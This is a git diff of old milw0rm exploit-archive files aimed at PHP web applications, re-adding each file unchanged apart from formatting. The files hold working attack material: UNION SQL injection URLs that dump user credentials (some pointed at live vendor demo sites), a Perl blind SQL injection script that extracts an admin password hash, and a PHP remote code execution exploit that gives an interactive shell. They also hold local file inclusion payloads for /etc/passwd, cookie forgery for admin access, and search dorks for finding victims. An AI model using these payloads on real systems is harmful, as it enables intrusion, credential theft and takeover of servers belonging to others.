+D.O.M Labs - Security Researchers +- www.domlabs.org + +Vuln code: + +----- +88: function visita($id) { +93: $resultado=$bd->consulta("SELECT direccion, clicks FROM links WHERE id=$id LIMIT 1"); +.... + +112: if ($_GET['id']) { +113: links::visita($_GET['id']) +----- + + +Proof of Concept: + +http://[host]/[cms]/?s=links&id=1 and 1=1 -> True +http://[host]/[cms]/?s=links&id=1 and 1=0 -> False +http://[host]/[cms]/?s=links&id=1 and ascii(substring(@@version,1,1)=52 + + +__END__ + +# milw0rm.com [2008-09-30] 
diff --git a/platforms/php/webapps/6637.txt b/platforms/php/webapps/6637.txt
index 05751de3c..28a39682f 100755
--- a/platforms/php/webapps/6637.txt
+++ b/platforms/php/webapps/6637.txt
@@ -1,49 +1,49 @@ -|___________________________________________________| -| -| BookMarks Favourites Script (view_group.php id) Remote SQL Injection Vulnerability -| -|___________________________________________________ -|-------------------- Hussin X -------------------| -| -| Author: Hussin X -| -| Home : IQ-SecuritY > WwW.IQ-ty.CoM -| -| email: darkangel_g85[at]Yahoo[DoT]com -| -|___________________________________________________ -| | -| -| script : http://www.quidascript.com/index.php?main_page=product_info&products_id=77 -| -| DorK : inurl:view_group.php?id= -|___________________________________________________| - - -Exploit: - -www.[target].com/Script/view_group.php?id=-1+union+select+0,'Im-IRAQI',concat_ws(0x3a,username,password),0,0,0,0,0+FROM+apb_users-- - - - -Demo : - -http://www.quidascript.com/bookmarks/view_group.php?id=-1+union+select+0,'Im-IRAQI',concat_ws(0x3a,username,password),0,0,0,0,0+FROM+apb_users-- - - - - - -____________________________( Greetz )_________________________________ -| -| All members of the Forum WwW.IQ-ty.CoM | WwW.TrYaG.CC | -| -| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr -| -| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab -|______________________________________________________________________ - - - Im IRAQi | Im TrYaGi - -# milw0rm.com [2008-09-30] +|___________________________________________________| +| +| BookMarks Favourites Script (view_group.php id) Remote SQL Injection Vulnerability +| +|___________________________________________________ +|-------------------- Hussin X -------------------| +| +| Author: Hussin X +| +| Home : IQ-SecuritY > WwW.IQ-ty.CoM +| +| email: darkangel_g85[at]Yahoo[DoT]com +| +|___________________________________________________ +| | +| +| script : http://www.quidascript.com/index.php?main_page=product_info&products_id=77 +| +| DorK : inurl:view_group.php?id= +|___________________________________________________| + + +Exploit: + 
+www.[target].com/Script/view_group.php?id=-1+union+select+0,'Im-IRAQI',concat_ws(0x3a,username,password),0,0,0,0,0+FROM+apb_users-- + + + +Demo : + +http://www.quidascript.com/bookmarks/view_group.php?id=-1+union+select+0,'Im-IRAQI',concat_ws(0x3a,username,password),0,0,0,0,0+FROM+apb_users-- + + + + + +____________________________( Greetz )_________________________________ +| +| All members of the Forum WwW.IQ-ty.CoM | WwW.TrYaG.CC | +| +| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr +| +| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab +|______________________________________________________________________ + + + Im IRAQi | Im TrYaGi + +# milw0rm.com [2008-09-30] diff --git a/platforms/php/webapps/6639.txt b/platforms/php/webapps/6639.txt index aeccceec5..025a76de1 100755 --- a/platforms/php/webapps/6639.txt +++ b/platforms/php/webapps/6639.txt 
@@ -1,39 +1,39 @@ --=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -Printlog <= 0.4: Remote File Edition Vulnerability --=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= - -$ Program: Printlog -$ File affected: index.php -$ Version: 0.4 -$ Download: http://www.hardkap.net/pritlog - - -Found by Pepelux -eNYe-Sec - www.enye-sec.org - --- Description (by the author's page) -- -PRITLOG is an extremely simple, small and powerful blog system. It does not -use or need a MYSQL database and fully works based on flat files. The idea -is derived from a similar app called PPLOG. - --- Bug -- -You can navigate and see the entries. Something like as: - http://localhost/p/index.php?option=viewEntry&filename=00001 - -Code doesn't check the comments directory: - -709. function viewEntry() { -710. $fileName = isset($_POST['filename'])?$_POST['filename']:$_GET['filename']; -711. global $postdir, $separator, $newPostFile, $newFullPostNumber, $debugMode, $config_textAreaCols, $config_textAreaRows; -712. global $config_allowComments, $config_commentsSecurityCode, $config_CAPTCHALength, $config_randomString; -713. global $commentdir,$config_dbFilesExtension, $config_onlyNumbersOnCAPTCHA; -714. $viewFileName=$postdir.$fileName.$config_dbFilesExtension; - - --- Exploit -- -If magic quotes are off you can do: - http://localhost/p/index.php?option=viewEntry&filename=../config.php%00 - -config.php has the admin password - -# milw0rm.com [2008-09-30] +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= +Printlog <= 0.4: Remote File Edition Vulnerability +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= + +$ Program: Printlog +$ File affected: index.php +$ Version: 0.4 +$ Download: http://www.hardkap.net/pritlog + + +Found by Pepelux +eNYe-Sec - www.enye-sec.org + +-- Description (by the author's page) -- +PRITLOG is an extremely simple, small and powerful blog system. It does not +use or need a MYSQL database and fully works based on flat files. 
The idea +is derived from a similar app called PPLOG. + +-- Bug -- +You can navigate and see the entries. Something like as: + http://localhost/p/index.php?option=viewEntry&filename=00001 + +Code doesn't check the comments directory: + +709. function viewEntry() { +710. $fileName = isset($_POST['filename'])?$_POST['filename']:$_GET['filename']; +711. global $postdir, $separator, $newPostFile, $newFullPostNumber, $debugMode, $config_textAreaCols, $config_textAreaRows; +712. global $config_allowComments, $config_commentsSecurityCode, $config_CAPTCHALength, $config_randomString; +713. global $commentdir,$config_dbFilesExtension, $config_onlyNumbersOnCAPTCHA; +714. $viewFileName=$postdir.$fileName.$config_dbFilesExtension; + + +-- Exploit -- +If magic quotes are off you can do: + http://localhost/p/index.php?option=viewEntry&filename=../config.php%00 + +config.php has the admin password + +# milw0rm.com [2008-09-30] diff --git a/platforms/php/webapps/6640.pl b/platforms/php/webapps/6640.pl index d4117070b..8b89d3d0d 100755 --- a/platforms/php/webapps/6640.pl +++ b/platforms/php/webapps/6640.pl 
@@ -1,50 +1,50 @@ -#!/usr/bin/perl -# -------------------------------------------------- -# ADN Forum <= 1.0b Blind SQL Injection Exploit -# Discovered By: StAkeR - StAkeR[at]hotmail[dot]it -# Discovered On: 01/10/2008 -# Download: http://sourceforge.net/projects/adnforum/ -# -------------------------------------------------- -# Usage: perl exploit.pl http://localhost -# -------------------------------------------------- - -use strict; -use warnings; -use LWP::UserAgent; -use URI::Escape; - -my ($request,$send,$ord,$hash,$uid) = (undef,undef,undef,undef,1); - -my $host = shift @ARGV or die "[?] Usage: perl $0 http://[host]\n"; -my @chars = (48..57, 97..102); -my $http = new LWP::UserAgent; - -for(0..32) -{ - foreach $ord(@chars) - { - $send = "' or ascii(substring((select password from adn_usuarios where id=1),$uid,1))=$ord#"; - $send = uri_escape($send); - - $request = $http->get($host."/index.php?fid=".$send); - - if($request->is_success and $request->content =~ /hace clic en el boton de abajo/i) - { - $hash .= chr($ord); - $uid++; - } - } -} - -if(defined $hash) -{ - print "[+] MD5: $hash\n"; - exit; -} -else -{ - print "[?] Exploit Failed!\n"; - exit; -} - -# milw0rm.com [2008-10-01] +#!/usr/bin/perl +# -------------------------------------------------- +# ADN Forum <= 1.0b Blind SQL Injection Exploit +# Discovered By: StAkeR - StAkeR[at]hotmail[dot]it +# Discovered On: 01/10/2008 +# Download: http://sourceforge.net/projects/adnforum/ +# -------------------------------------------------- +# Usage: perl exploit.pl http://localhost +# -------------------------------------------------- + +use strict; +use warnings; +use LWP::UserAgent; +use URI::Escape; + +my ($request,$send,$ord,$hash,$uid) = (undef,undef,undef,undef,1); + +my $host = shift @ARGV or die "[?] 
Usage: perl $0 http://[host]\n"; +my @chars = (48..57, 97..102); +my $http = new LWP::UserAgent; + +for(0..32) +{ + foreach $ord(@chars) + { + $send = "' or ascii(substring((select password from adn_usuarios where id=1),$uid,1))=$ord#"; + $send = uri_escape($send); + + $request = $http->get($host."/index.php?fid=".$send); + + if($request->is_success and $request->content =~ /hace clic en el boton de abajo/i) + { + $hash .= chr($ord); + $uid++; + } + } +} + +if(defined $hash) +{ + print "[+] MD5: $hash\n"; + exit; +} +else +{ + print "[?] Exploit Failed!\n"; + exit; +} + +# milw0rm.com [2008-10-01] diff --git a/platforms/php/webapps/6641.txt b/platforms/php/webapps/6641.txt index bbfacf79d..f443b226e 100755 --- a/platforms/php/webapps/6641.txt +++ b/platforms/php/webapps/6641.txt 
@@ -1,42 +1,42 @@ -# MySQL Quick Admin <= 1.5.5 (COOKIE) Local File Inclusion Vulnerability -# url: http://www.mysqlquickadmin.com/ -# -# Author: JosS -# mail: sys-project[at]hotmail[dot]com -# site: http://spanish-hackers.com -# team: Spanish Hackers Team - [SHT] -# -# This was written for educational purpose. Use it at your own risk. -# Author will be not responsible for any damage. -# -# Greetz To: Pepelux :) -# -# *Requirements: magic_quotes_gpc = Off - -vuln file: /includes/required.php -vuln code: - -if(!empty($_COOKIE['language']) && !isset($_SESSION['language'])){ - $_SESSION['language'] = $_COOKIE['language']; -} - -.... - -if(LANG == ""){ - if(!isset($_SESSION['language'])){ - include("lang/english/lang.php"); - $_LANG = "english"; - } else { - include("lang/".$_SESSION['language']."/lang.php"); - $_LANG = $_SESSION['language']; - } - -... } - -LFI (poc): -1) javascript:document.cookie="language=../../../../../../../../../../etc/passwd%00; path=/"; -2) and enters /index.php - -Ingenious work :D - -# milw0rm.com [2008-10-01] +# MySQL Quick Admin <= 1.5.5 (COOKIE) Local File Inclusion Vulnerability +# url: http://www.mysqlquickadmin.com/ +# +# Author: JosS +# mail: sys-project[at]hotmail[dot]com +# site: http://spanish-hackers.com +# team: Spanish Hackers Team - [SHT] +# +# This was written for educational purpose. Use it at your own risk. +# Author will be not responsible for any damage. +# +# Greetz To: Pepelux :) +# +# *Requirements: magic_quotes_gpc = Off + +vuln file: /includes/required.php +vuln code: + +if(!empty($_COOKIE['language']) && !isset($_SESSION['language'])){ + $_SESSION['language'] = $_COOKIE['language']; +} + +.... + +if(LANG == ""){ + if(!isset($_SESSION['language'])){ + include("lang/english/lang.php"); + $_LANG = "english"; + } else { + include("lang/".$_SESSION['language']."/lang.php"); + $_LANG = $_SESSION['language']; + } + +... 
} + +LFI (poc): +1) javascript:document.cookie="language=../../../../../../../../../../etc/passwd%00; path=/"; +2) and enters /index.php + +Ingenious work :D + +# milw0rm.com [2008-10-01] diff --git a/platforms/php/webapps/6642.txt b/platforms/php/webapps/6642.txt index b5cc04e16..0f15579ad 100755 --- a/platforms/php/webapps/6642.txt +++ b/platforms/php/webapps/6642.txt @@ -1,13 +1,13 @@ -Author: ~!Dok_tOR!~ -Date found: 30.09.08 -Product: BMForum -Version: 5.6 -URL: www.bmforum.com -Vulnerability Class: SQL Injection -Condition: magic_quotes_gpc = Off - -Exploit: - -http://localhost/[installdir]/plugins.php?p=tags&forumid=0&tagname=-1'+union+select+1,concat_ws(0x3a,username,pwd),3,4+from+bmb_userlist+where+userid=1/* - -# milw0rm.com [2008-10-01] +Author: ~!Dok_tOR!~ +Date found: 30.09.08 +Product: BMForum +Version: 5.6 +URL: www.bmforum.com +Vulnerability Class: SQL Injection +Condition: magic_quotes_gpc = Off + +Exploit: + +http://localhost/[installdir]/plugins.php?p=tags&forumid=0&tagname=-1'+union+select+1,concat_ws(0x3a,username,pwd),3,4+from+bmb_userlist+where+userid=1/* + +# milw0rm.com [2008-10-01] diff --git a/platforms/php/webapps/6644.txt b/platforms/php/webapps/6644.txt index 1ef2cbb28..4c7a168c4 100755 --- a/platforms/php/webapps/6644.txt +++ b/platforms/php/webapps/6644.txt 
@@ -1,17 +1,17 @@ -Author: ~!Dok_tOR!~ -Date found: 30.09.08 -Product: NonameCMS -Version: 1.0 -URL: noname-cms.org -Vulnerability Class: SQL Injection -Condition: magic_quotes_gpc = Off - -Exploit 1: - -http://localhost/[installdir]/index.php?action=detailansicht&file_id=-1'+union+select+1,2,3,4,5,6,concat_ws(0x3a,benutzername,passwort,email),8+from+nns_user/* - -Exploit 2: - -http://localhost/[installdir]/index.php?action=kategorien&kategorie=-1'+union+select+1,2,user(),concat_ws(0x3a,benutzername,passwort,email),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+nns_user/* - -# milw0rm.com [2008-10-01] +Author: ~!Dok_tOR!~ +Date found: 30.09.08 +Product: NonameCMS +Version: 1.0 +URL: noname-cms.org +Vulnerability Class: SQL Injection +Condition: magic_quotes_gpc = Off + +Exploit 1: + +http://localhost/[installdir]/index.php?action=detailansicht&file_id=-1'+union+select+1,2,3,4,5,6,concat_ws(0x3a,benutzername,passwort,email),8+from+nns_user/* + +Exploit 2: + +http://localhost/[installdir]/index.php?action=kategorien&kategorie=-1'+union+select+1,2,user(),concat_ws(0x3a,benutzername,passwort,email),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+nns_user/* + +# milw0rm.com [2008-10-01] diff --git a/platforms/php/webapps/6645.txt b/platforms/php/webapps/6645.txt index 462403eb5..67d8711bd 100755 --- a/platforms/php/webapps/6645.txt +++ b/platforms/php/webapps/6645.txt 
@@ -1,19 +1,19 @@ - ~~+=========================================================+~~ - ~~+=========================================================+~~ - [?] Crux Gallery <= 1.32 Local File Inclusion Vulnerability - [?] Discovered On: 01/10/2008 - [*] PHP.ini - [*] Magic_Quotes_Gpc = Off - ~~+=========================================================+~~ - (index.php) // Greetz -> Osirys and darkjoker - 14. $m = $_GET['m']; - 15. $p = $_GET['p']; - 16. $dir = $_GET['dir']; - 17. require_once("main.php"); - 18. require_once("themes/".$theme."/theme.php"); - $theme isn't declared, so you can include any file. - [*] http//[path]/index.php?theme=../../../../../etc/passwd%00 - [*] How To Fix: declare $theme - ~~+=========================================================+~~ - -# milw0rm.com [2008-10-01] + ~~+=========================================================+~~ + ~~+=========================================================+~~ + [?] Crux Gallery <= 1.32 Local File Inclusion Vulnerability + [?] Discovered On: 01/10/2008 + [*] PHP.ini + [*] Magic_Quotes_Gpc = Off + ~~+=========================================================+~~ + (index.php) // Greetz -> Osirys and darkjoker + 14. $m = $_GET['m']; + 15. $p = $_GET['p']; + 16. $dir = $_GET['dir']; + 17. require_once("main.php"); + 18. require_once("themes/".$theme."/theme.php"); + $theme isn't declared, so you can include any file. + [*] http//[path]/index.php?theme=../../../../../etc/passwd%00 + [*] How To Fix: declare $theme + ~~+=========================================================+~~ + +# milw0rm.com [2008-10-01] diff --git a/platforms/php/webapps/6646.php b/platforms/php/webapps/6646.php index bedbfe021..f2e6edcb8 100755 --- a/platforms/php/webapps/6646.php +++ b/platforms/php/webapps/6646.php 
@@ -1,107 +1,107 @@ -set_title(translate("Processing $Class")); - 53. $t->printHTMLHeader(); - 54. $t->startMain(); - 55. - 56. process_reservation($_POST['fn']); - 57. } - 58. else { - 59. $res_info = getResInfo(); - 60. $t->set_title($res_info['title']); - 61. $t->printHTMLHeader(); - 62. $t->startMain(); - 63. present_reservation($res_info['resid']); - 64. } - - [...] - - 79. function process_reservation($fn) { - 80. $success = false; - 81. global $Class; - 82. $is_pending = (isset($_POST['pending']) && $_POST['pending']); - 83. - 84. if (isset($_POST['start_date'])) { // Parse the POST-ed starting and ending dates - 85. $start_date = eval('return mktime(0,0,0, \'' . str_replace(INTERNAL_DATE_SEPERATOR, '\',\'', $_POST['start_date']) . '\');'); - 86. $end_date = eval('return mktime(0,0,0, \'' . str_replace(INTERNAL_DATE_SEPERATOR, '\',\'', $_POST['end_date']) . '\');'); - 87. } - - An attacker might be able to inject and execute PHP code through $_POST['start_date'], that is passed to eval() at line 85 -*/ - -error_reporting(0); -set_time_limit(0); -ini_set("default_socket_timeout", 5); - -define(STDIN, fopen("php://stdin", "r")); - -function http_send($host, $packet) -{ - $sock = fsockopen($host, 80); - while (!$sock) - { - print "\n[-] No response from {$host}:80 Trying again..."; - $sock = fsockopen($host, 80); - } - fputs($sock, $packet); - while (!feof($sock)) $resp .= fread($sock, 1024); - fclose($sock); - return $resp; -} - -print "\n+---------------------------------------------------------------+"; -print "\n| phpScheduleIt <= 1.2.10 Remote Code Execution Exploit by EgiX |"; -print "\n+---------------------------------------------------------------+\n"; - -if ($argc < 3) -{ - print "\nUsage......: php $argv[0] host path\n"; - print "\nExample....: php $argv[0] localhost /"; - print "\nExample....: php $argv[0] localhost /phpscheduleit/\n"; - die(); -} - -$host = $argv[1]; -$path = $argv[2]; - -$payload = 
"btnSubmit=1&start_date=1').\${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${die};%%23"; -$packet = "POST {$path}reserve.php HTTP/1.0\r\n"; -$packet .= "Host: {$host}\r\n"; -$packet .= "Referer: {$path}reserve.php\r\n"; -$packet .= "Cmd: %s\r\n"; -$packet .= "Content-Length: ".(strlen($payload)-1)."\r\n"; -$packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; -$packet .= "Connection: close\r\n\r\n"; -$packet .= $payload; - -while(1) -{ - print "\nphpscheduleit-shell# "; - $cmd = trim(fgets(STDIN)); - if ($cmd != "exit") - { - $html = http_send($host, sprintf($packet, base64_encode($cmd))); - $shell = explode("_code_", $html); - preg_match("/_code_/", $html) ? print "\n{$shell[1]}" : die("\n[-] Exploit failed...\n"); - } - else break; -} - -?> - -# milw0rm.com [2008-10-01] +set_title(translate("Processing $Class")); + 53. $t->printHTMLHeader(); + 54. $t->startMain(); + 55. + 56. process_reservation($_POST['fn']); + 57. } + 58. else { + 59. $res_info = getResInfo(); + 60. $t->set_title($res_info['title']); + 61. $t->printHTMLHeader(); + 62. $t->startMain(); + 63. present_reservation($res_info['resid']); + 64. } + + [...] + + 79. function process_reservation($fn) { + 80. $success = false; + 81. global $Class; + 82. $is_pending = (isset($_POST['pending']) && $_POST['pending']); + 83. + 84. if (isset($_POST['start_date'])) { // Parse the POST-ed starting and ending dates + 85. $start_date = eval('return mktime(0,0,0, \'' . str_replace(INTERNAL_DATE_SEPERATOR, '\',\'', $_POST['start_date']) . '\');'); + 86. $end_date = eval('return mktime(0,0,0, \'' . str_replace(INTERNAL_DATE_SEPERATOR, '\',\'', $_POST['end_date']) . '\');'); + 87. 
} + + An attacker might be able to inject and execute PHP code through $_POST['start_date'], that is passed to eval() at line 85 +*/ + +error_reporting(0); +set_time_limit(0); +ini_set("default_socket_timeout", 5); + +define(STDIN, fopen("php://stdin", "r")); + +function http_send($host, $packet) +{ + $sock = fsockopen($host, 80); + while (!$sock) + { + print "\n[-] No response from {$host}:80 Trying again..."; + $sock = fsockopen($host, 80); + } + fputs($sock, $packet); + while (!feof($sock)) $resp .= fread($sock, 1024); + fclose($sock); + return $resp; +} + +print "\n+---------------------------------------------------------------+"; +print "\n| phpScheduleIt <= 1.2.10 Remote Code Execution Exploit by EgiX |"; +print "\n+---------------------------------------------------------------+\n"; + +if ($argc < 3) +{ + print "\nUsage......: php $argv[0] host path\n"; + print "\nExample....: php $argv[0] localhost /"; + print "\nExample....: php $argv[0] localhost /phpscheduleit/\n"; + die(); +} + +$host = $argv[1]; +$path = $argv[2]; + +$payload = "btnSubmit=1&start_date=1').\${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${die};%%23"; +$packet = "POST {$path}reserve.php HTTP/1.0\r\n"; +$packet .= "Host: {$host}\r\n"; +$packet .= "Referer: {$path}reserve.php\r\n"; +$packet .= "Cmd: %s\r\n"; +$packet .= "Content-Length: ".(strlen($payload)-1)."\r\n"; +$packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; +$packet .= "Connection: close\r\n\r\n"; +$packet .= $payload; + +while(1) +{ + print "\nphpscheduleit-shell# "; + $cmd = trim(fgets(STDIN)); + if ($cmd != "exit") + { + $html = http_send($host, sprintf($packet, base64_encode($cmd))); + $shell = explode("_code_", $html); + preg_match("/_code_/", $html) ? print "\n{$shell[1]}" : die("\n[-] Exploit failed...\n"); + } + else break; +} + +?> + +# milw0rm.com [2008-10-01] diff --git a/platforms/php/webapps/6648.txt b/platforms/php/webapps/6648.txt index 052c58348..122e7438b 100755 
--- a/platforms/php/webapps/6648.txt +++ b/platforms/php/webapps/6648.txt 
@@ -1,52 +1,52 @@ -######################################################### -# -# RPortal v1.1 -# -# -# Rportal is a management system of contents simple and powerful Web, -# enabling you to create your site in a few minutes, while profiting -# from a complete and effective administration. -# -# -# Remote and Local File Inclusion Vulnerability <= 1.1 -# Found the 29th September 2008 - -########################################################## -# Author: Kad -# -# mail : kadfrox [ a ] gmail [ dot ] com -# -########################################################## -# -# script : RPortal v 1.1 -# http://www.rportal.org/?op=download&fid=36 -# -########################################################## - -[~] Exploit : - - -http://www.site.com/index.php?file_op=[url] - -# -# Vulnerable code source : -# - -if(!isset($file_op))$file_op=''; - -if($file_op!="") - -{ - $op_basepath = trim(strrev(strstr(strrev($file_op),"/php/"))); - - if($op_basepath!='') $op_basepath = str_replace("/php/", "/", $op_basepath); - - include($file_op); - -} - -# The problem is that the variable $file_op is not filtered -# Then, you can put the link that you want, like your own backdoor -# and execute commands. - -# milw0rm.com [2008-10-01] +######################################################### +# +# RPortal v1.1 +# +# +# Rportal is a management system of contents simple and powerful Web, +# enabling you to create your site in a few minutes, while profiting +# from a complete and effective administration. 
+# +# +# Remote and Local File Inclusion Vulnerability <= 1.1 +# Found the 29th September 2008 + +########################################################## +# Author: Kad +# +# mail : kadfrox [ a ] gmail [ dot ] com +# +########################################################## +# +# script : RPortal v 1.1 +# http://www.rportal.org/?op=download&fid=36 +# +########################################################## + +[~] Exploit : + + +http://www.site.com/index.php?file_op=[url] + +# +# Vulnerable code source : +# + +if(!isset($file_op))$file_op=''; + +if($file_op!="") + +{ + $op_basepath = trim(strrev(strstr(strrev($file_op),"/php/"))); + + if($op_basepath!='') $op_basepath = str_replace("/php/", "/", $op_basepath); + + include($file_op); + +} + +# The problem is that the variable $file_op is not filtered +# Then, you can put the link that you want, like your own backdoor +# and execute commands. + +# milw0rm.com [2008-10-01] diff --git a/platforms/php/webapps/6649.txt b/platforms/php/webapps/6649.txt index ce338b2a6..169747353 100755 --- a/platforms/php/webapps/6649.txt +++ b/platforms/php/webapps/6649.txt 
@@ -1,22 +1,22 @@ -************************************************************************************** - -Author : By Crackers_Child -Contact: cashr00t@hotmail.com -Greetz : biyosecurity.com & milw0rm.com & tryag.cc & All My Friends - -************************************************************************************** -Script : Ranking Script - Insecure Cookie Handling Vulnerability -Demo : http://www.ranking-script.de -Dork : pagerank-0-topliste.html or pagerank-0-tipp.html - -************************************************************************************** - -Exploit : javascript:document.cookie = "admin=ja; path=/"; - -Than go to > pagerank-0-admindaten.html and edit All thingz :) - -************************************************************************************** -N0te : Ramazan Bayraminiz Mubarek Ola ! -************************************************************************************** - -# milw0rm.com [2008-10-01] +************************************************************************************** + +Author : By Crackers_Child +Contact: cashr00t@hotmail.com +Greetz : biyosecurity.com & milw0rm.com & tryag.cc & All My Friends + +************************************************************************************** +Script : Ranking Script - Insecure Cookie Handling Vulnerability +Demo : http://www.ranking-script.de +Dork : pagerank-0-topliste.html or pagerank-0-tipp.html + +************************************************************************************** + +Exploit : javascript:document.cookie = "admin=ja; path=/"; + +Than go to > pagerank-0-admindaten.html and edit All thingz :) + +************************************************************************************** +N0te : Ramazan Bayraminiz Mubarek Ola ! +************************************************************************************** + +# milw0rm.com [2008-10-01] diff --git a/platforms/php/webapps/6650.txt b/platforms/php/webapps/6650.txt index 112f5c77d..7409e70d0 100755 
--- a/platforms/php/webapps/6650.txt +++ b/platforms/php/webapps/6650.txt 
@@ -1,80 +1,80 @@ -|___________________________________________________| -| -| Link Trader (lnkid) Remote SQL Injection Vulnerability -| -|___________________________________________________ -|-------------------- Hussin X -------------------| -| -| Author: Hussin X -| -| Home : WwW.IQ-ty.CoM -| -| email: darkangel_g85[at]Yahoo[DoT]com -| -| -| -|___________________________________________________ -| | -| -| script : http://www.ezonescripts.com/scripts/sls/linktrader.php -| -| DorK : inurl:ratelink.php?lnkid= -|___________________________________________________| - -Exploit: - - - -www.[target].com/Script/ratelink.php?lnkid=-1+UNION+SELECT+1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7,8,9,10,11,12+from+o_categories/* - - - - - - -L!VE DEMO: - - -http://www.ezonescripts.com/productdemos/LinkTrader/ratelink.php?lnkid=-1+UNION+SELECT+1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7,8,9,10,11,12+from+o_categories/* - - - -__________________________ - -table_name : column_name - - -o_categories:c_name -o_categories:c_id -o_categories:c_date -o_links:l_id -o_links:l_name -o_links:l_email -o_links:l_cid -o_links:l_sitename -o_links:l_homeurl -o_links:l_linkurl -o_links:l_slogan -o_links:l_description -o_links:l_webmasterschoice -o_ratings:r_id -o_ratings:r_lid -o_ratings:r_votecount - -__________________________ - - - -____________________________( Greetz )_________________________________ -| -| All members of the Forum WwW.IQ-ty.CoM | WwW.TrYaG.CC | -| -| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr -| -| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab -|_____________________________________________________________________ - - - Im IRAQi | Im TrYaG I - -# milw0rm.com [2008-10-01] +|___________________________________________________| +| +| Link Trader (lnkid) Remote SQL Injection Vulnerability +| +|___________________________________________________ +|-------------------- Hussin X -------------------| +| +| Author: 
Hussin X +| +| Home : WwW.IQ-ty.CoM +| +| email: darkangel_g85[at]Yahoo[DoT]com +| +| +| +|___________________________________________________ +| | +| +| script : http://www.ezonescripts.com/scripts/sls/linktrader.php +| +| DorK : inurl:ratelink.php?lnkid= +|___________________________________________________| + +Exploit: + + + +www.[target].com/Script/ratelink.php?lnkid=-1+UNION+SELECT+1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7,8,9,10,11,12+from+o_categories/* + + + + + + +L!VE DEMO: + + +http://www.ezonescripts.com/productdemos/LinkTrader/ratelink.php?lnkid=-1+UNION+SELECT+1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7,8,9,10,11,12+from+o_categories/* + + + +__________________________ + +table_name : column_name + + +o_categories:c_name +o_categories:c_id +o_categories:c_date +o_links:l_id +o_links:l_name +o_links:l_email +o_links:l_cid +o_links:l_sitename +o_links:l_homeurl +o_links:l_linkurl +o_links:l_slogan +o_links:l_description +o_links:l_webmasterschoice +o_ratings:r_id +o_ratings:r_lid +o_ratings:r_votecount + +__________________________ + + + +____________________________( Greetz )_________________________________ +| +| All members of the Forum WwW.IQ-ty.CoM | WwW.TrYaG.CC | +| +| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr +| +| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab +|_____________________________________________________________________ + + + Im IRAQi | Im TrYaG I + +# milw0rm.com [2008-10-01] diff --git a/platforms/php/webapps/6652.txt b/platforms/php/webapps/6652.txt index 0f2f01b42..efb1500ad 100755 --- a/platforms/php/webapps/6652.txt +++ b/platforms/php/webapps/6652.txt 
@@ -1,21 +1,21 @@ -############################################################################################# -[+] Bux.to Clone script Insecure Cookie Handling Vulnerability -[+] Discovered By SirGod -[+] wWw.MorTal-TeaM.OrG -[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,Raven,Nytr0gen,str0ke,Codex -############################################################################################# - -[+] Download : http://depositfiles.com/files/6633532 - -[+] Dork : (c) SriptBux 2008 | Powered By ScriptBux version 2.50 beta 1 - -[+] Script : http://depositfiles.com/files/6633532 - -[+] Insecure Cookie Handling Vulnerability - -javascript:document.cookie = "loggedin=1; path=/"; document.cookie = -"usNick=admin; path=/"; - -############################################################################################# - -# milw0rm.com [2008-10-02] +############################################################################################# +[+] Bux.to Clone script Insecure Cookie Handling Vulnerability +[+] Discovered By SirGod +[+] wWw.MorTal-TeaM.OrG +[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,Raven,Nytr0gen,str0ke,Codex +############################################################################################# + +[+] Download : http://depositfiles.com/files/6633532 + +[+] Dork : (c) SriptBux 2008 | Powered By ScriptBux version 2.50 beta 1 + +[+] Script : http://depositfiles.com/files/6633532 + +[+] Insecure Cookie Handling Vulnerability + +javascript:document.cookie = "loggedin=1; path=/"; document.cookie = +"usNick=admin; path=/"; + +############################################################################################# + +# milw0rm.com [2008-10-02] diff --git a/platforms/php/webapps/6653.txt b/platforms/php/webapps/6653.txt index 1b2fae56a..811f42db6 100755 --- a/platforms/php/webapps/6653.txt +++ b/platforms/php/webapps/6653.txt 
@@ -1,49 +1,49 @@ -Security Advisory for 'OLIB 7 Webview' - -This software is apart of Moodle. - -Software - OLIB 7 WebView v2.5.1.1 -Exploit - LFI -Severity - High -Author - ZeN -website - http://dusecurity.com/ -Date - 2nd October 2008 - -DUSecurity Team / DarkCode - - -Exploit > - -http://olib.site.com/cgi/?session=[session_key]&infile=[LFI] - -files in dir - get_settings.ini, setup.ini(contains config file locations), text.ini - - -Info - You need to login to get a valid session key. - - ------------------- -Extraz : - -Moodle Permanent XSS - -In Moodle blogging system, simply make a new blog entry with the title - - - -Now everyone that visits the bloggins system with execute your XSS. -Go get some cookies =D - -Enjoy! - ------------------- - - -Shouts :- -DUSecurity.com -DarkCode.me -Milw0rm.com -iWannaHack -WL-Group - -# milw0rm.com [2008-10-02] +Security Advisory for 'OLIB 7 Webview' + +This software is apart of Moodle. + +Software - OLIB 7 WebView v2.5.1.1 +Exploit - LFI +Severity - High +Author - ZeN +website - http://dusecurity.com/ +Date - 2nd October 2008 + 